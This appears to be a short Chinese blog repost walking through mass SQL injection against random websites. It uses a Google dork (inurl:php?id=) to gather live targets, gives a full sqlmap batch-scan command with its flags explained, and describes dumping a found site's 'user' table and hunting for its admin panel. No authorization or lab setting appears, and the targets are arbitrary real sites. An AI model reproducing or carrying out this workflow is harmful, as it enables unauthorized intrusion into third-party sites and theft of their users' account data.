sqlmap测试php实战
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqlmap测试php实战相关的知识,希望对你有一定的参考价值。
在Google上搜索inurl:php?id=
将搜集的url写到一个文件当中url.txt中
sqlmap -m url.txt --random-agent --thread=10 --timeout=5 --batch --retries=1 --identify-waf
-m指定url文件
--random-agent 使用随机代理
--thread=10 设置线程数为10
--timeout=5 连接超时5秒放弃
--batch 扫描过程中遇到选项时选择默认选项
--retries 连接失败尝试一次重连
--identify-waf 遇到waf的站点跳过
经过一段时间的扫描,扫描到一个存在sql注入漏洞的站点
扫描所有的表
针对其中的一个表user
扫描这个表
--dump 获取表内容
-T user指定表
获取到表的内容
找后台可以用御剑
以上是关于sqlmap测试php实战的主要内容,如果未能解决你的问题,请参考以下文章
任何事情,努力才有可能,新书《网络攻防实战-sqlmap从入门到精通》目录及架构